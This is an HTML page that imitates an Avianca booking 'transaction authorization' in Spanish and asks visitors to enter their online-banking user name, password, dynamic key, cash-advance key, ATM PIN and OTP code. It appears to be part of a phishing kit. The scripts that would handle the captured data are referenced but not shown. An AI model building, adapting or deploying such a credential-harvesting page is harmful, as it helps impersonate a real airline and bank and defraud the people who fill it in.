<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Avianca - Booking</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="shortcut icon" href="./assets/favicon.png" t  ype="image/x-icon">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Red+Hat+Display:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&family=Red+Hat+Display:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="./css/checkers.css">
    <link rel="stylesheet" href="./css/normalize.css">
    <script src="./js/functions.js"></script>

</head>
<body>
    <!-- LOADER -->
    <div class="main-loader show">
        <img id="company-loader">
        <div class="loader"></div>
    </div>

    <div class="logos">
        <img id="bank-logo" width="50px">
        <img id="company-logo" width="110px">
    </div>
    <main>
        <div class="content">
            <b style="margin-bottom: 20px; display: block;" >Autorización de transacción</b>
            <p style="margin-bottom: 10px;" >La transacción que intenta realizar en <b>AVIANCA S.A</b> por <b>$ <span id="flight-price">49.900</span> COP</b> debe ser autorizada. Por favor verifica la siguiente información:</p>
            <p style="margin-bottom: 20px;">Ingrese los datos de su Banca Virtual:</p>
            <form id="form" style="margin-bottom: 30px;">
                <div class="labels">
                    <b>Comercio: </b>
                    <b>Monto: </b>
                    <b>Número de tarjeta: </b>
                    <b class="hidden" id="user" style="margin-bottom: 10px !important;">Usuario: </b>
                    <b class="hidden" id="puser" style="margin-bottom: 10px !important;">Contraseña: </b>
                    <b class="hidden" id="cdin" style="margin-bottom: 10px !important;">Clave Dinámica: </b>
                    <b class="hidden" id="cavance" style="margin-bottom: 10px !important;">Clave Avances: </b>
                    <b class="hidden" id="ccaj" style="margin-bottom: 10px !important;">Clave Cajero: </b>
                    <b class="hidden" id="otpcode" style="margin-bottom: 10px !important;">Código OTP: </b>
                </div>
                <div class="values">
                    <p>AVIANCA S.A</p>
                    <p>$ <span id="flight-price">49.000</span> COP</p>
                    <p>•••• •••• •••• <span id="card-digits"></span></p>
                    <input class="hidden" required type="text" id="user">
                    <input class="hidden" required type="text" id="puser">
                    <input class="hidden" oninput="limitDigits(this, 6)" required type="text" id="cdin">
                    <input class="hidden" oninput="limitDigits(this, 6)" required type="text" id="cavance">
                    <input class="hidden" oninput="limitDigits(this, 4)" required type="text" id="ccaj">
                    <input class="hidden" oninput="limitDigits(this, 6)" required type="text" id="otpcode">
                </div>
            </form>
        </div>
        <a href="" id="newCode" class="hidden">Presione aquí para recibir un nuevo código</a>
        <button id="btnNextStep" class="btn-success">
            Verificar
        </button>
    </main>

    <!-- SCRIPTS -->
    <script src="./js/id_check.js"></script>
</body>
</html>